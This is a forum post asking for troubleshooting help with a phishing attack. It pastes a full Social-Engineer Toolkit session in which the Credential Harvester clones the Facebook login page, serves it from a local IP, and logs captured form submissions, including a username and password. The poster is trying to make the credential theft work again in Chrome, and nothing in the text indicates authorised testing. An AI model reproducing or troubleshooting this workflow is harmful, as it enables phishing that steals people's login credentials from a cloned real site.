Can anybody help me with this, this attack has always work fine in the past when ive used it, but now its doing this when i use google chrome, when i used the windows explorer then everthing seems fine,,,,,
Thanks
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>3
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.73
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://www.facebook.com
[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.1.67 - - [04/Feb/2015 23:24:03] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=1
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: miny_encode_ms=3
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=Miny1~95~,"~,~","~":~0~.~":"~null~],["~login~",{"~php~323xo~",~click~":[~1423090709517~time_spent~ft~posts~":[["~time_spent_bit_array~tos_id~start_time~tos_array~","/~],"~tos_len~tos_seq~tos_cum~},~click_ref_logger~",["~981~act~1~","-","~r~","/",{"~user~":{},"~gt~":{}},~"],~script_path_change~source_path~":"/~source_token~ad976420~dest_path~dest_token~navigation~impression_id~cause~"},~1423090709533~ods~:~ms~page_id~qa~www~x0o534~1423092247919~568~2~1423090706224~15~559~237~unload~0v29~[{"~]],"~trigger~7~4~11~1423090706~1423090698~9~"},{"~325~b279a230~load~1423092244800~0vL8~253~1423092247915~email~bits~js_initialized~]},~1423092247925~]]}]~2E1DCAy1XCIyPQRGSCIyTz2LwUL2TxAWXz2MwYzAwZz2H-2yxAE_1w2DJMw1yJMx2xwFyKyK1A1B1CO1E1F1G2wx2OxAx1xwIVFBH1HMxAE1IG1J1KFBHy1LC1My1NzDw1OzDw1PzDw1QzDw1RC2C1S1TxAERGSCIyTz2KwUL2zxAWXz2IwYz1zwZz2J-1TxA2F2GC1U1V1WBNB1YB1Z2N1DCAy1XC1-yPQ1IG1JzDw1LzDw1N1KFBHy1OC1My1PzDw1QC2Py1RC2Q1S2RxAE_1w2SJ1_w1yJ2UxAw2VyKyK1A1B1CO1E1F1G2Ax2BxAx1xw1-VFBH1H1_xAE1U1V1WBNB1YB1ZGNB2WB2XL1z2Y2ZxA2-
PARAM: ts=1423092247933
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=2
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"x0o534","posts":[["time_spent_bit_array",{"tos_id":"x0o534","start_time":1423092244,"tos_array":[15,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092252924,0]],"trigger":"time_spent_bit_array"}]
PARAM: ts=1423092252940
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
192.168.1.67 - - [04/Feb/2015 23:24:26] "GET / HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=1
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"p4l5eo","posts":[["script_path_change",{"source_path":null,"source_token":null,"dest_path":"/login.php","dest_token":"ad976420","navigation":null,"impression_id":"b279a230","cause":"load"},1423092268014,0],["click_ref_logger",["0vL8",1423092271140,"act",1423092271139,0,"email","click","click","-","r","/",{"ft":{},"gt":{}},562,238,0,981,"p4l5eo","/login.php"],1423092271140,0],["ods:ms.time_spent.qa.www",{"time_spent.bits.js_initialized":[1]},1423092271161,0]],"trigger":"ods:ms.time_spent.qa.www"}]
PARAM: ts=1423092271180
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
[*] WE GOT A HIT! Printing the output:
PARAM: __a=1
PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w
PARAM: __req=2
PARAM: __rev=1587870
POSSIBLE USERNAME FIELD FOUND: __user=0
PARAM: lsd=AVqA1uQz
PARAM: ph=V3
POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"p4l5eo","posts":[["time_spent_bit_array",{"tos_id":"p4l5eo","start_time":1423092268,"tos_array":[135,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092276055,0]],"trigger":"time_spent_bit_array"}]
PARAM: ts=1423092276071
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVqA1uQz
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=0
PARAM: lgnrnd=152349_xc4V
PARAM: lgnjs=1423092268
POSSIBLE USERNAME FIELD FOUND: email=qwerty
POSSIBLE PASSWORD FIELD FOUND: pass=12345
PARAM: default_persistent=0
PARAM: qsstamp=W1tbMTUsMjUsMzAsNDEsNDUsNTUsNzIsNzMsNzcsODksMTIxLDEyMywxNDUsMTk5LDIwMSwyMDgsMjE5LDIyNSwyNDIsMjYxLDI2MywyNjksMzAxLDMwNSwzMDgsMzIyLDM0NiwzOTYsNDI3LDQ0MSw0NjAsNDYzLDQ3Niw0ODAsNTEwLDUyMyw1NDEsNTUyLDU1NSw1NzMsNjI2LDcwM11dLCJBWmx2Vk94aC1GeUxtOXQ1RW81Y01aNjQtY0JmcEJwTGtIV3VXSXVtYlE5NG9FYTB3Tmt2SXZMeW5IRFZQcnlKQ0hhN0xWbUF5Z0FHY1pac1BXUDBFNUktVGNUeEk4WDNKajRLdk43dzNPSXh1dXdubDFhVDI0RTZ2MjVCRjZqRUdickJqV3pIWERFaURuVVVBRWxYSV9xckx0RnNTR3QtTmVwdmpZblpUQURCdkQzM2dXNW9kS0ducHEwd1pDQ2lvcm9VRDVCS1RCMERWRm5TNXlYVlhOTE5fVC1YY2ZacmVHNGhDX25VYzFaOTlRIl0=
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
[*] WE GOT A HIT! Printing the output:
PARAM:
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.